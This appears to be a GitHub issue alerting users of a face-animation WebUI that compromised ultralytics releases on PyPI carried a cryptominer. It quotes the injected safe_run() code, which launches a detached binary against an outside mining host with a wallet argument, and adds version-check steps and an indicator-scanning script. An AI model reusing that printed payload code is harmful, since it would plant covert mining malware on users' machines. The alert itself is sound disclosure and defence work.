🚨 Security Alert from Ultralytics #19

jhj0517 opened this issue Dec 6, 2024 · 0 comments
jhj0517 commented Dec 6, 2024

🚨 Security Alert from Ultralytics

The ultralytics versions 8.3.41, 8.3.42, 8.3.45, 8.3.46 are infected by malware.
This is for the people who may have installed this WebUI during these time windows (UTC):

ultralytics==8.3.41 (was listed on PyPI for about 12 hours)

  • 2024-12-04 20:51 ~ 2024-12-05 09:15

ultralytics==8.3.42 (was listed on PyPI for about 1 hour)

  • 2024-12-05 12:47 ~ 2024-12-05 13:47

There was an echo shell injection attack on ultralytics, 2024-12-05, about 48 hours ago.

Ultralytics is the object segmentation package that has more than 33k stars on Github, in this project it's used to detect the face part of the image.

The hacker successfully released the new versions of this package using echo shell injection - PR #18020, PR #18018.

The malicious versions are ultralytics==8.3.41 and ultralytics==8.3.42.

🚨 Severity

The severity is very high.

The injected code is:

def safe_run(path):
    os.chmod(path, 0o770)
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    os.remove(path)

It gets permission from your system for executable files, runs a crypto-mining job, and executes other malicious executable files.

Not only is it likely to be running crypto-mining code, it could be full-blown infostealer malware or whatever.

What you should do

Again, the infected packages are ultralytics==8.3.41 and ultralytics==8.3.42.

If you installed this WebUI during the time windows below (UTC):

  • 2024-12-04 20:51 ~ 2024-12-05 09:15

  • 2024-12-05 12:47 ~ 2024-12-05 13:47

you're possibly infected by the malicious ultralytics version.

You should now check the installed ultralytics version with this WebUI.

How to?

  1. Open your terminal.
  2. Navigate to the project directory:
cd "/path/to/AdvancedLivePortrait-WebUI"
  3. Activate the virtual environment:
  • On Windows:
.\venv\Scripts\activate
  • On macOS/Linux:
source venv/bin/activate
  4. It will then display (venv) in front of the terminal prompt. In this state, run pip show:
(venv) pip show ultralytics

It will display the version of ultralytics.
If the version is 8.3.41 or 8.3.42, it's recommended that you reinstall your operating system after backing up your important files to another server.

Etc

The vulnerability was reported to Github Advisory prior to this attack - GHSA-7x29-qqmq-v6qc
And the issue is now tracked by ultralytics/ultralytics#18027
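As an added example (not part of the issue above, and not code from the AdvancedLivePortrait-WebUI or ultralytics projects), the following stand-alone Python script automates the manual `pip show` check from the post and goes one step further: it scans the installed package's `.py` files for the strings that appear in the injected `safe_run()` snippet quoted above (the `connect.consrensys.com` endpoint, the function name, and the wallet-looking argument). The version list and indicator strings are taken from the alert text; the function names, the `check_environment()` result layout and the choice to scan only `.py` files are assumptions of this example. It uses only the standard library, so it can be run inside the affected virtual environment without installing anything else.

```python
"""Check an environment for the compromised ultralytics releases named in this alert.

Added example: not code from the issue, the WebUI, or ultralytics. Only the
standard library is used so it can run inside the (venv) without extra installs.
"""
from __future__ import annotations

from importlib import metadata
from pathlib import Path

# Versions named in the alert text above (all four appear in its first sentence).
COMPROMISED_VERSIONS = frozenset({"8.3.41", "8.3.42", "8.3.45", "8.3.46"})

# Literal strings taken from the injected safe_run() snippet quoted in the alert.
INDICATORS = (
    "connect.consrensys.com",
    "def safe_run(",
    "4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw",
)


def is_compromised_version(version: str) -> bool:
    """Exact match against the versions the alert names (no PEP 440 range logic needed)."""
    return version.strip() in COMPROMISED_VERSIONS


def find_indicators(text: str) -> list[str]:
    """Return the indicator strings present in `text`, in INDICATORS order."""
    return [ioc for ioc in INDICATORS if ioc in text]


def scan_package_files(files) -> dict[str, list[str]]:
    """Scan an iterable of Path objects; return {path: [indicators]} for files with hits.

    Only .py files are read (assumption of this example); unreadable or missing
    files are skipped rather than aborting the whole scan.
    """
    hits: dict[str, list[str]] = {}
    for path in files:
        if path.suffix != ".py":
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        found = find_indicators(text)
        if found:
            hits[str(path)] = found
    return hits


def installed_version(dist_name: str = "ultralytics") -> str | None:
    """Version string of the installed distribution, or None if it is not installed."""
    try:
        return metadata.version(dist_name)
    except metadata.PackageNotFoundError:
        return None


def check_environment(dist_name: str = "ultralytics") -> dict:
    """Combine the version check with an indicator scan of the installed files."""
    version = installed_version(dist_name)
    result = {
        "installed": version is not None,
        "version": version,
        "bad_version": False,
        "indicator_hits": {},
    }
    if version is None:
        return result
    result["bad_version"] = is_compromised_version(version)
    dist = metadata.distribution(dist_name)
    # dist.files is None when the installer recorded no RECORD file; treat as empty.
    files = [Path(dist.locate_file(f)) for f in (dist.files or [])]
    result["indicator_hits"] = scan_package_files(files)
    return result


if __name__ == "__main__":
    report = check_environment()
    if not report["installed"]:
        print("ultralytics is not installed in this environment")
    else:
        print(f"ultralytics {report['version']} installed")
        if report["bad_version"]:
            print("  -> version is one of the releases named in the alert")
        for path, iocs in report["indicator_hits"].items():
            print(f"  -> indicator(s) {iocs} found in {path}")
        if not report["bad_version"] and not report["indicator_hits"]:
            print("  no known-bad version or indicator found")
```

Run it from the activated `(venv)` with `python check_ultralytics.py`. A bad-version hit alone is reason enough to follow the reinstall advice above; the file scan is a second signal for the case where the version string has been altered or the package was installed from a cache rather than PyPI. A clean result only means none of the indicators from this alert were found, not that the environment is verified clean.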

@jhj0517 jhj0517 added the Alert Emergency Alert label Dec 6, 2024
@jhj0517 jhj0517 self-assigned this Dec 6, 2024
@jhj0517 jhj0517 pinned this issue Dec 6, 2024
@jhj0517 jhj0517 closed this as completed Dec 22, 2024
@jhj0517 jhj0517 unpinned this issue Dec 22, 2024